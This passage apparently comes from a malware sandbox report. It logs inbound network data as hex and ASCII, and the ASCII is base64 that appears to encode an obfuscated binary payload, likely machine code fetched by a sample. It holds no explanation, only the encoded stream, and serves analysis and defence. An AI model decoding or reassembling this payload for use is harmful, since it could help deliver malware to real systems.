AzNCxgMjgsYERFLGBDQSxgQ0IsYDMzLGA2MixgMDEsYDE0LGBFMCxgMzEsYEU2LGBFMSxgMTcsYDkxLGA4NCxgM0QsYERDLGBERCxgNzQsYERFLGBEOSxgQUUsYEYyLGA4RSxgOEEsYDY5LGA5QixgOTYsYDVCLGAxRixgMDAsYDg5LGAxOSxgNjQsYDMyLGA1RSxgMTQsYDI1LGAxMixgNDcsYERCLGAwRixgMUMsYERBLGBGRSxgODEsYEM4L
2021-12-02 17:26:37 UTC	1411	IN	Data Raw: 41 7a 4e 53 78 67 4f 54 51 73 59 45 4d 31 4c 47 41 7a 4e 53 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 51 34 4c 47 41 79 4d 43 78 67 4e 54 59 73 59 44 68 43 4c 47 41 33 4d 43 78 67 4d 6a 51 73 59 44 55 33 4c 47 41 34 51 69 78 67 4e 7a 67 73 59 44 41 30 4c 47 41 34 4d 79 78 67 4e 30 59 73 59 44 51 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 45 51 78 4c 47 41 33 4e 43 78 67 4d 44 55 73 59 44 68 43 4c 47 41 31 4d 43 78 67 4d 55 4d 73 59 44 68 43 4c 47 42 47 4d 53 78 67 4f 44 55 73 59 45 51 79 4c 47 41 33 4e 43 78 67 4d 54 55 73 59 44 68 45 4c 47 41 30 4e 69 78 67 52 6a 51 73 59 44 4e 45 4c 47 42 47 4d 79 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 7a 63 73 59 44 42 43 4c Data Ascii: AzNSxgOTQsYEM1LGAzNSxgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDQ4LGAyMCxgNTYsYDhCLGA3MCxgMjQsYDU3LGA4QixgNzgsYDA0LGA4MyxgN0YsYDQwLGAwMCxgOEIsYEQxLGA3NCxgMDUsYDhCLGA1MCxgMUMsYDhCLGBGMSxgODUsYEQyLGA3NCxgMTUsYDhELGA0NixgRjQsYDNELGBGMyxgMDEsYDAwLGAwMCxgNzcsYDBCL
2021-12-02 17:26:37 UTC	1427	IN	Data Raw: 41 34 4e 79 78 67 4e 6a 51 73 59 44 45 78 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 78 4e 43 78 67 4d 45 59 73 59 44 6b 30 4c 47 42 44 4d 69 78 67 4f 45 51 73 59 44 67 32 4c 47 41 31 4d 43 78 67 4d 30 4d 73 59 44 52 47 4c 47 41 77 4d 43 78 67 4f 44 6b 73 59 44 6b 32 4c 47 41 30 4d 43 78 67 4d 30 4d 73 59 44 52 47 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 68 47 4c 47 42 42 4d 43 78 67 4d 54 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 55 30 4c 47 41 78 4f 53 78 67 4e 7a 49 73 59 44 55 79 4c 47 41 31 4d 43 78 67 52 54 67 73 59 45 56 45 4c 47 41 79 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4f 44 59 73 59 44 51 30 4c 47 41 7a 51 79 78 67 4e 45 59 73 59 44 41 77 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c Data Ascii: A4NyxgNjQsYDExLGAwMCxgMDAsYDZBLGAxNCxgMEYsYDk0LGBDMixgOEQsYDg2LGA1MCxgM0MsYDRGLGAwMCxgODksYDk2LGA0MCxgM0MsYDRGLGAwMCxgOEIsYDhGLGBBMCxgMTQsYDAwLGAwMCxgOEQsYDU0LGAxOSxgNzIsYDUyLGA1MCxgRTgsYEVELGAyQSxgMDAsYDAwLGBDNyxgODYsYDQ0LGAzQyxgNEYsYDAwLGAwMSxgMDAsYDAwL
2021-12-02 17:26:37 UTC	1443	IN	Data Raw: 41 32 51 53 78 67 4d 44 41 73 59 44 55 78 4c 47 41 34 52 43 78 67 51 6a 41 73 59 45 59 30 4c 47 41 77 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 4e 54 41 73 59 45 55 34 4c 47 41 34 4e 43 78 67 4d 54 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 78 4f 43 78 67 4f 45 49 73 59 44 51 31 4c 47 41 78 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 41 78 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4e 43 78 67 4e 54 49 73 59 44 68 43 4c 47 41 31 4e 53 78 67 4d 45 4d 73 59 44 55 77 4c 47 41 34 51 69 78 67 4d 44 59 73 59 44 55 78 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 45 51 77 4c 47 41 31 52 53 78 67 4e 55 51 73 59 45 4d 7a 4c 47 41 32 52 43 78 67 4e 44 49 73 59 44 41 34 4c 47 41 35 4e 53 78 67 4d 30 55 73 59 44 67 79 4c Data Ascii: A2QSxgMDAsYDUxLGA4RCxgQjAsYEY0LGAwQixgMDAsYDAwLGA1NixgNTAsYEU4LGA4NCxgMTAsYDAwLGAwMCxgOEIsYDU1LGAxOCxgOEIsYDQ1LGAxNCxgOEIsYDRELGAxMCxgODMsYEM0LGAxNCxgNTIsYDhCLGA1NSxgMEMsYDUwLGA4QixgMDYsYDUxLGA1MixgRkYsYEQwLGA1RSxgNUQsYEMzLGA2RCxgNDIsYDA4LGA5NSxgM0UsYDgyL
2021-12-02 17:26:37 UTC	1459	IN	Data Raw: 41 78 4e 43 78 67 4e 54 41 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 41 73 59 44 55 78 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 31 4d 69 78 67 4e 54 41 73 59 44 55 78 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 56 46 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41 31 52 53 78 67 4f 45 49 73 59 45 55 31 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 45 56 45 4c 47 41 79 51 69 78 67 4e 30 55 73 59 44 55 77 4c 47 42 42 52 43 78 67 4f 44 63 73 59 45 51 31 4c 47 41 30 51 53 78 67 4d 44 51 73 59 45 59 34 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 55 4d 73 59 44 45 30 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 41 34 4c 47 41 34 51 69 78 67 4e 54 41 73 59 44 45 30 4c Data Ascii: AxNCxgNTAsYDhCLGA0NSxgMTAsYDUxLGA4QixgNEQsYDBDLGA1MixgNTAsYDUxLGBGRixgRDYsYDVFLGA4QixgRTUsYDVELGBDMyxgMzMsYEMwLGA1RSxgOEIsYEU1LGA1RCxgQzMsYEVELGAyQixgN0UsYDUwLGBBRCxgODcsYEQ1LGA0QSxgMDQsYEY4LGA1NSxgOEIsYEVDLGA4MyxgRUMsYDE0LGA4QixgNDUsYDA4LGA4QixgNTAsYDE0L
2021-12-02 17:26:37 UTC	1475	IN	Data Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 51 32 4c 47 41 7a 4d 43 78 67 4e 54 41 73 59 44 68 45 4c 47 41 34 52 43 78 67 52 6a 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 78 4c 47 42 46 4f 43 78 67 51 54 41 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 45 4c 47 41 35 4e 53 78 67 52 6a 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 31 4e 79 78 67 52 54 67 73 59 44 41 7a 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 45 77 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 41 77 52 69 78 67 4f 45 49 73 59 44 4d 32 4c 47 41 7a 4f 53 78 67 4e 44 59 73 59 44 45 34 4c 47 41 33 4e 53 78 67 52 44 55 73 59 44 56 47 4c Data Ascii: AwMCxgMDAsYDAwLGAwMCxgOEIsYDQ2LGAzMCxgNTAsYDhELGA4RCxgRjQsYEZFLGBGRixgRkYsYDUxLGBFOCxgQTAsYDBELGAwMCxgMDAsYDhELGA5NSxgRjQsYEZFLGBGRixgRkYsYDUyLGA1NyxgRTgsYDAzLGA5NyxgRkYsYEZGLGA4MyxgQzQsYDEwLGA4NSxgQzAsYDc1LGAwRixgOEIsYDM2LGAzOSxgNDYsYDE4LGA3NSxgRDUsYDVGL
2021-12-02 17:26:37 UTC	1491	IN	Data Raw: 41 34 4f 43 78 67 4e 44 51 73 59 44 6c 46 4c 47 41 31 4e 69 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4d 45 59 73 59 45 49 33 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 51 79 78 67 4e 6a 59 73 59 44 67 31 4c 47 42 44 4f 53 78 67 4e 7a 51 73 59 44 45 7a 4c 47 41 77 52 69 78 67 51 6a 63 73 59 45 4d 35 4c 47 41 7a 51 69 78 67 52 44 45 73 59 44 63 30 4c 47 41 78 51 69 78 67 4d 45 59 73 59 45 49 33 4c 47 41 30 4f 43 78 67 4d 44 49 73 59 44 67 7a 4c 47 42 44 4d 43 78 67 4d 44 49 73 59 44 59 32 4c 47 41 34 4e 53 78 67 51 7a 6b 73 59 44 63 31 4c 47 42 46 52 43 78 67 4d 45 59 73 59 45 49 33 4c 47 41 77 4f 43 78 67 4e 54 4d 73 59 44 4d 7a 4c 47 42 45 51 69 78 67 4d 30 49 73 59 45 51 78 4c Data Ascii: A4OCxgNDQsYDlFLGA1NixgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgMEYsYEI3LGAwOCxgOEIsYDU1LGAwQyxgNjYsYDg1LGBDOSxgNzQsYDEzLGAwRixgQjcsYEM5LGAzQixgRDEsYDc0LGAxQixgMEYsYEI3LGA0OCxgMDIsYDgzLGBDMCxgMDIsYDY2LGA4NSxgQzksYDc1LGBFRCxgMEYsYEI3LGAwOCxgNTMsYDMzLGBEQixgM0IsYEQxL
2021-12-02 17:26:37 UTC	1507	IN	Data Raw: 42 47 52 69 78 67 4e 44 45 73 59 44 4e 43 4c 47 42 44 52 53 78 67 4e 7a 49 73 59 45 55 7a 4c 47 41 34 51 53 78 67 4f 54 55 73 59 45 5a 44 4c 47 42 47 52 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 7a 55 73 59 44 41 34 4c 47 41 34 4e 43 78 67 52 44 49 73 59 44 63 30 4c 47 41 78 51 53 78 67 4f 45 51 73 59 44 67 31 4c 47 42 47 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 49 73 59 45 4e 46 4c 47 41 31 4e 79 78 67 4e 6a 59 73 59 44 42 47 4c 47 42 43 52 53 78 67 4d 7a 67 73 59 44 59 32 4c 47 41 34 4f 53 78 67 4d 7a 6b 73 59 44 51 77 4c 47 41 34 4d 79 78 67 51 7a 45 73 59 44 41 79 4c 47 41 34 4d 43 78 67 4d 7a 67 73 59 44 41 77 4c 47 41 33 4e 53 78 67 52 6a 41 73 59 44 56 47 4c 47 41 7a 4d 79 78 67 51 7a 41 73 59 44 67 30 4c Data Ascii: BGRixgNDEsYDNCLGBDRSxgNzIsYEUzLGA4QSxgOTUsYEZDLGBGRSxgRkYsYEZGLGA4QixgNzUsYDA4LGA4NCxgRDIsYDc0LGAxQSxgOEQsYDg1LGBGQyxgRkUsYEZGLGBGRixgOEIsYENFLGA1NyxgNjYsYDBGLGBCRSxgMzgsYDY2LGA4OSxgMzksYDQwLGA4MyxgQzEsYDAyLGA4MCxgMzgsYDAwLGA3NSxgRjAsYDVGLGAzMyxgQzAsYDg0L
2021-12-02 17:26:37 UTC	1511	IN	Data Raw: 41 30 4e 53 78 67 52 6b 4d 73 59 44 63 30 4c 47 41 77 4e 69 78 67 4f 44 4d 73 59 45 4d 77 4c 47 41 77 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 4e 54 59 73 59 44 68 43 4c 47 41 33 4e 53 78 67 4d 54 41 73 59 44 55 33 4c 47 41 7a 4d 79 78 67 52 6b 59 73 59 44 4d 35 4c 47 41 33 52 53 78 67 4d 45 4d 73 59 44 42 47 4c 47 41 34 4e 69 78 67 52 6b 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 34 52 43 78 67 4e 55 55 73 59 44 45 30 4c 47 41 34 52 43 78 67 4f 55 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 4d 73 59 44 41 30 4c 47 41 34 51 69 78 67 4d 45 49 73 59 44 68 43 4c 47 41 31 4e 53 78 67 52 6b 4d 73 59 44 55 77 4c 47 41 77 4d 79 78 67 51 30 55 73 59 44 55 78 4c Data Ascii: A0NSxgRkMsYDc0LGAwNixgODMsYEMwLGAwOCxgODksYDQ1LGBGQyxgNTYsYDhCLGA3NSxgMTAsYDU3LGAzMyxgRkYsYDM5LGA3RSxgMEMsYDBGLGA4NixgRkYsYDAwLGAwMCxgMDAsYDUzLGA4RCxgNUUsYDE0LGA4RCxgOUIsYDAwLGAwMCxgMDAsYDAwLGA4QixgNDMsYDA0LGA4QixgMEIsYDhCLGA1NSxgRkMsYDUwLGAwMyxgQ0UsYDUxL
2021-12-02 17:26:37 UTC	1527	IN	Data Raw: 42 44 4d 79 78 67 51 54 59 73 59 44 46 46 4c 47 41 30 4e 43 78 67 4f 44 45 73 59 45 56 43 4c 47 42 43 51 69 78 67 51 54 67 73 59 44 41 32 4c 47 42 43 4d 53 78 67 51 6a 63 73 59 44 4a 44 4c 47 42 44 4d 53 78 67 4d 6a 55 73 59 44 6c 45 4c 47 41 34 51 69 78 67 52 44 45 73 59 45 56 44 4c 47 41 78 4e 53 78 67 51 7a 45 73 59 44 4e 45 4c 47 41 35 52 53 78 67 52 45 51 73 59 45 45 34 4c 47 41 34 4e 69 78 67 4e 7a 51 73 59 44 51 7a 4c 47 41 77 4d 69 78 67 4d 6a 55 73 59 44 41 34 4c 47 42 45 4e 43 78 67 52 45 59 73 59 44 64 43 4c 47 41 34 4d 43 78 67 52 45 4d 73 59 44 67 30 4c 47 41 79 4d 43 78 67 4d 7a 55 73 59 45 55 79 4c 47 41 34 4d 43 78 67 52 54 51 73 59 45 5a 44 4c 47 41 78 4d 79 78 67 4d 6b 51 73 59 44 42 47 4c 47 41 30 4d 79 78 67 4d 45 49 73 59 44 45 77 4c Data Ascii: BDMyxgQTYsYDFFLGA0NCxgODEsYEVCLGBCQixgQTgsYDA2LGBCMSxgQjcsYDJDLGBDMSxgMjUsYDlELGA4QixgRDEsYEVDLGAxNSxgQzEsYDNELGA5RSxgREQsYEE4LGA4NixgNzQsYDQzLGAwMixgMjUsYDA4LGBENCxgREYsYDdCLGA4MCxgREMsYDg0LGAyMCxgMzUsYEUyLGA4MCxgRTQsYEZDLGAxMyxgMkQsYDBGLGA0MyxgMEIsYDEwL
2021-12-02 17:26:37 UTC	1543	IN	Data Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 67 73 59 45 4d 7a 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 33 4d 69 78 67 52 6b 55 73 59 44 67 33 4c 47 41 7a 4e 53 78 67 4e 7a 49 73 59 45 45 32 4c 47 42 46 52 53 78 67 4e 54 67 73 59 45 4d 77 4c 47 41 77 4e 53 78 67 4f 44 67 73 59 44 49 77 4c 47 41 34 52 53 78 67 4f 54 67 73 59 45 46 42 4c 47 42 42 51 79 78 67 4e 45 45 73 59 44 45 35 4c 47 41 77 4e 53 78 67 4f 45 55 73 59 44 55 34 4c 47 41 32 51 69 78 67 4e 45 49 73 59 45 4d 77 4c 47 41 77 52 43 78 67 4d 54 49 73 59 44 64 44 4c 47 41 79 52 43 78 67 51 6b 49 73 59 45 46 43 4c 47 42 44 4d 69 78 67 52 44 6b 73 59 44 45 33 4c 47 42 44 4d 79 78 67 52 54 67 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c Data Ascii: AwMCxgMDAsYDAwLGAwMCxgNTgsYEMzLGA1NSxgOEIsYEVDLGA3MixgRkUsYDg3LGAzNSxgNzIsYEE2LGBFRSxgNTgsYEMwLGAwNSxgODgsYDIwLGA4RSxgOTgsYEFBLGBBQyxgNEEsYDE5LGAwNSxgOEUsYDU4LGA2QixgNEIsYEMwLGAwRCxgMTIsYDdDLGAyRCxgQkIsYEFCLGBDMixgRDksYDE3LGBDMyxgRTgsYDAwLGAwMCxgMDAsYDAwL
2021-12-02 17:26:37 UTC	1559	IN	Data Raw: 41 79 4f 43 78 67 4d 55 45 73 59 45 51 79 4c 47 41 77 51 69 78 67 4e 6b 49 73 59 44 4e 44 4c 47 41 35 51 79 78 67 52 44 55 73 59 45 45 7a 4c 47 41 31 51 53 78 67 51 6b 55 73 59 45 59 35 4c 47 41 34 4f 53 78 67 52 6b 59 73 59 44 56 46 4c 47 42 42 4e 69 78 67 4e 44 4d 73 59 45 45 7a 4c 47 42 46 4f 53 78 67 4d 7a 49 73 59 44 4a 46 4c 47 42 46 51 53 78 67 4e 7a 67 73 59 45 51 78 4c 47 42 45 4e 69 78 67 4d 54 41 73 59 44 6c 46 4c 47 42 44 4d 79 78 67 52 54 55 73 59 44 59 31 4c 47 41 33 4f 53 78 67 4e 7a 63 73 59 44 5a 45 4c 47 41 79 4f 53 78 67 52 55 55 73 59 44 49 79 4c 47 41 7a 4d 69 78 67 4e 55 45 73 59 45 45 32 4c 47 42 43 51 79 78 67 4d 44 67 73 59 45 51 32 4c 47 41 30 51 79 78 67 4e 55 59 73 59 44 5a 45 4c 47 42 43 4e 79 78 67 4f 55 4d 73 59 44 51 31 4c Data Ascii: AyOCxgMUEsYEQyLGAwQixgNkIsYDNDLGA5QyxgRDUsYEEzLGA1QSxgQkUsYEY5LGA4OSxgRkYsYDVFLGBBNixgNDMsYEEzLGBFOSxgMzIsYDJFLGBFQSxgNzgsYEQxLGBENixgMTAsYDlFLGBDMyxgRTUsYDY1LGA3OSxgNzcsYDZELGAyOSxgRUUsYDIyLGAzMixgNUEsYEE2LGBCQyxgMDgsYEQ2LGA0QyxgNUYsYDZELGBCNyxgOUMsYDQ1L
2021-12-02 17:26:37 UTC	1575	IN	Data Raw: 41 35 51 53 78 67 4f 55 49 73 59 44 5a 43 4c 47 41 31 51 79 78 67 51 54 4d 73 59 45 51 31 4c 47 41 77 4e 53 78 67 4e 45 55 73 59 45 52 47 4c 47 42 43 4f 53 78 67 4d 7a 4d 73 59 44 49 30 4c 47 42 43 4e 79 78 67 52 6a 45 73 59 45 4a 42 4c 47 41 30 4e 53 78 67 4e 6b 4d 73 59 44 59 77 4c 47 42 43 4d 79 78 67 52 44 51 73 59 45 59 31 4c 47 41 31 51 79 78 67 4d 55 59 73 59 45 4d 35 4c 47 42 47 4f 53 78 67 4e 6a 67 73 59 44 6b 78 4c 47 41 7a 51 79 78 67 4d 45 55 73 59 45 45 78 4c 47 41 31 51 53 78 67 4f 44 59 73 59 44 5a 45 4c 47 42 42 4e 79 78 67 4f 45 49 73 59 44 4e 46 4c 47 41 35 52 53 78 67 4d 54 63 73 59 45 4e 43 4c 47 41 32 51 79 78 67 51 6a 63 73 59 44 45 33 4c 47 41 33 51 79 78 67 4d 7a 59 73 59 45 4d 30 4c 47 42 45 4f 53 78 67 4f 44 67 73 59 44 4a 44 4c Data Ascii: A5QSxgOUIsYDZCLGA1QyxgQTMsYEQ1LGAwNSxgNEUsYERGLGBCOSxgMzMsYDI0LGBCNyxgRjEsYEJBLGA0NSxgNkMsYDYwLGBCMyxgRDQsYEY1LGA1QyxgMUYsYEM5LGBGOSxgNjgsYDkxLGAzQyxgMEUsYEExLGA1QSxgODYsYDZELGBBNyxgOEIsYDNFLGA5RSxgMTcsYENCLGA2QyxgQjcsYDE3LGA3QyxgMzYsYEM0LGBEOSxgODgsYDJDL
2021-12-02 17:26:37 UTC	1591	IN	Data Raw: 42 43 51 69 78 67 52 44 45 73 59 45 55 34 4c 47 42 44 52 69 78 67 4f 44 4d 73 59 45 56 44 4c 47 41 35 4d 69 78 67 51 54 41 73 59 45 52 46 4c 47 42 47 52 53 78 67 4d 7a 6b 73 59 45 59 30 4c 47 41 31 4d 53 78 67 51 6b 49 73 59 45 52 43 4c 47 41 33 4d 43 78 67 4e 7a 6b 73 59 44 55 7a 4c 47 41 34 51 79 78 67 51 30 51 73 59 44 51 31 4c 47 41 79 4e 43 78 67 52 6a 63 73 59 45 45 31 4c 47 42 44 4d 79 78 67 51 54 4d 73 59 44 6b 30 4c 47 41 34 52 43 78 67 4d 6a 6b 73 59 45 4d 31 4c 47 42 44 51 69 78 67 51 6a 49 73 59 44 41 77 4c 47 42 42 4e 79 78 67 52 44 6b 73 59 44 41 30 4c 47 41 7a 52 53 78 67 4e 7a 59 73 59 44 45 31 4c 47 41 34 51 79 78 67 52 45 49 73 59 45 51 31 4c 47 41 35 4e 53 78 67 4d 7a 49 73 59 45 49 79 4c 47 41 30 4d 69 78 67 4d 6a 51 73 59 44 46 42 4c Data Ascii: BCQixgRDEsYEU4LGBDRixgODMsYEVDLGA5MixgQTAsYERFLGBGRSxgMzksYEY0LGA1MSxgQkIsYERCLGA3MCxgNzksYDUzLGA4QyxgQ0QsYDQ1LGAyNCxgRjcsYEE1LGBDMyxgQTMsYDk0LGA4RCxgMjksYEM1LGBDQixgQjIsYDAwLGBBNyxgRDksYDA0LGAzRSxgNzYsYDE1LGA4QyxgREIsYEQ1LGA5NSxgMzIsYEIyLGA0MixgMjQsYDFBL
2021-12-02 17:26:37 UTC	1607	IN	Data Raw: 41 34 52 43 78 67 51 54 45 73 59 45 56 43 4c 47 41 79 51 69 78 67 4d 44 41 73 59 44 55 33 4c 47 41 34 4e 69 78 67 4e 54 6b 73 59 44 41 35 4c 47 41 77 4e 53 78 67 4e 6a 67 73 59 44 52 46 4c 47 41 79 52 69 78 67 51 6b 49 73 59 44 46 42 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 45 5a 42 4c 47 41 31 51 69 78 67 4d 6a 59 73 59 44 6c 47 4c 47 41 35 4d 43 78 67 51 30 49 73 59 44 4d 33 4c 47 41 78 51 79 78 67 4e 54 63 73 59 45 56 42 4c 47 41 77 52 53 78 67 4d 6b 4d 73 59 44 41 30 4c 47 42 42 4d 53 78 67 51 7a 55 73 59 44 6c 43 4c 47 41 32 52 43 78 67 4f 54 45 73 59 44 63 31 4c 47 41 30 51 53 78 67 4d 44 67 73 59 44 4d 77 4c 47 42 43 4e 69 78 67 52 6a 63 73 59 44 63 77 4c 47 41 33 4d 43 78 67 51 6a 49 73 59 44 63 7a 4c 47 41 32 52 69 78 67 4d 6a 4d 73 59 44 4d 78 4c Data Ascii: A4RCxgQTEsYEVCLGAyQixgMDAsYDU3LGA4NixgNTksYDA5LGAwNSxgNjgsYDRFLGAyRixgQkIsYDFBLGAzRCxgN0YsYEZBLGA1QixgMjYsYDlGLGA5MCxgQ0IsYDM3LGAxQyxgNTcsYEVBLGAwRSxgMkMsYDA0LGBBMSxgQzUsYDlCLGA2RCxgOTEsYDc1LGA0QSxgMDgsYDMwLGBCNixgRjcsYDcwLGA3MCxgQjIsYDczLGA2RixgMjMsYDMxL
2021-12-02 17:26:37 UTC	1623	IN	Data Raw: 42 46 51 69 78 67 52 6a 67 73 59 44 67 34 4c 47 41 33 4e 43 78 67 4e 7a 4d 73 59 45 52 44 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 44 51 78 4c 47 41 33 51 79 78 67 4f 44 45 73 59 44 46 44 4c 47 42 46 4f 53 78 67 4f 55 51 73 59 45 49 34 4c 47 42 44 4e 53 78 67 52 54 55 73 59 44 49 33 4c 47 42 42 4f 43 78 67 51 30 45 73 59 45 49 79 4c 47 41 79 4d 69 78 67 51 54 6b 73 59 44 5a 46 4c 47 41 30 4e 43 78 67 52 6a 59 73 59 44 68 43 4c 47 41 32 52 69 78 67 4e 30 45 73 59 44 59 79 4c 47 42 44 4f 53 78 67 4f 54 51 73 59 45 55 32 4c 47 41 30 51 53 78 67 52 6a 51 73 59 44 52 43 4c 47 42 43 4e 43 78 67 51 55 4d 73 59 45 5a 45 4c 47 42 45 51 69 78 67 4d 44 63 73 59 44 42 43 4c 47 41 34 51 53 78 67 4e 54 63 73 59 45 52 44 4c 47 41 35 51 53 78 67 4d 45 51 73 59 44 63 79 4c Data Ascii: BFQixgRjgsYDg4LGA3NCxgNzMsYERDLGBBNixgRkYsYDQxLGA3QyxgODEsYDFDLGBFOSxgOUQsYEI4LGBDNSxgRTUsYDI3LGBBOCxgQ0EsYEIyLGAyMixgQTksYDZFLGA0NCxgRjYsYDhCLGA2RixgN0EsYDYyLGBDOSxgOTQsYEU2LGA0QSxgRjQsYDRCLGBCNCxgQUMsYEZELGBEQixgMDcsYDBCLGA4QSxgNTcsYERDLGA5QSxgMEQsYDcyL
2021-12-02 17:26:37 UTC	1639	IN	Data Raw: 42 42 52 43 78 67 52 55 59 73 59 44 6c 47 4c 47 42 42 52 53 78 67 4e 44 6b 73 59 45 4a 44 4c 47 42 47 51 53 78 67 4d 44 45 73 59 44 59 77 4c 47 41 33 4f 43 78 67 52 54 4d 73 59 44 55 34 4c 47 41 7a 4f 53 78 67 4d 30 45 73 59 44 46 44 4c 47 42 46 4f 53 78 67 4e 55 4d 73 59 45 4a 46 4c 47 41 78 51 53 78 67 52 6a 4d 73 59 45 51 31 4c 47 41 77 4e 69 78 67 4d 6a 49 73 59 45 49 79 4c 47 42 44 4d 53 78 67 4e 30 49 73 59 44 64 44 4c 47 41 34 4d 53 78 67 51 6a 6b 73 59 45 46 43 4c 47 41 33 51 53 78 67 51 55 45 73 59 45 55 34 4c 47 41 79 4f 53 78 67 4f 44 49 73 59 45 59 78 4c 47 42 47 52 43 78 67 4e 7a 51 73 59 44 55 78 4c 47 41 77 4f 53 78 67 51 6b 49 73 59 44 56 44 4c 47 41 78 4e 53 78 67 51 6a 59 73 59 44 56 45 4c 47 41 33 52 53 78 67 52 6a 63 73 59 45 52 42 4c Data Ascii: BBRCxgRUYsYDlGLGBBRSxgNDksYEJDLGBGQSxgMDEsYDYwLGA3OCxgRTMsYDU4LGAzOSxgM0EsYDFDLGBFOSxgNUMsYEJFLGAxQSxgRjMsYEQ1LGAwNixgMjIsYEIyLGBDMSxgN0IsYDdDLGA4MSxgQjksYEFCLGA3QSxgQUEsYEU4LGAyOSxgODIsYEYxLGBGRCxgNzQsYDUxLGAwOSxgQkIsYDVDLGAxNSxgQjYsYDVELGA3RSxgRjcsYERBL
2021-12-02 17:26:37 UTC	1655	IN	Data Raw: 42 47 4f 53 78 67 4e 6a 41 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4d 55 49 73 59 44 59 7a 4c 47 41 33 4d 43 78 67 51 30 51 73 59 45 55 77 4c 47 41 7a 4e 79 78 67 4e 6b 51 73 59 45 51 34 4c 47 41 35 52 53 78 67 52 45 49 73 59 44 41 30 4c 47 42 43 4d 43 78 67 4d 7a 51 73 59 44 4a 45 4c 47 41 30 4d 53 78 67 52 55 51 73 59 45 5a 46 4c 47 41 7a 4e 79 78 67 4d 7a 67 73 59 44 45 77 4c 47 41 30 51 53 78 67 4e 6b 49 73 59 44 46 46 4c 47 41 78 51 69 78 67 4d 6a 4d 73 59 44 55 32 4c 47 42 43 51 79 78 67 51 55 51 73 59 44 42 43 4c 47 41 78 4e 53 78 67 52 6b 59 73 59 45 45 32 4c 47 41 7a 4e 79 78 67 4d 55 55 73 59 45 49 31 4c 47 41 77 52 53 78 67 52 54 55 73 59 44 45 30 4c 47 41 7a 4f 43 78 67 4e 30 59 73 59 44 6b 78 4c 47 41 77 4e 69 78 67 4d 6a 67 73 59 44 6c 46 4c Data Ascii: BGOSxgNjAsYEVDLGAyNyxgMUIsYDYzLGA3MCxgQ0QsYEUwLGAzNyxgNkQsYEQ4LGA5RSxgREIsYDA0LGBCMCxgMzQsYDJELGA0MSxgRUQsYEZFLGAzNyxgMzgsYDEwLGA0QSxgNkIsYDFFLGAxQixgMjMsYDU2LGBCQyxgQUQsYDBCLGAxNSxgRkYsYEE2LGAzNyxgMUUsYEI1LGAwRSxgRTUsYDE0LGAzOCxgN0YsYDkxLGAwNixgMjgsYDlFL
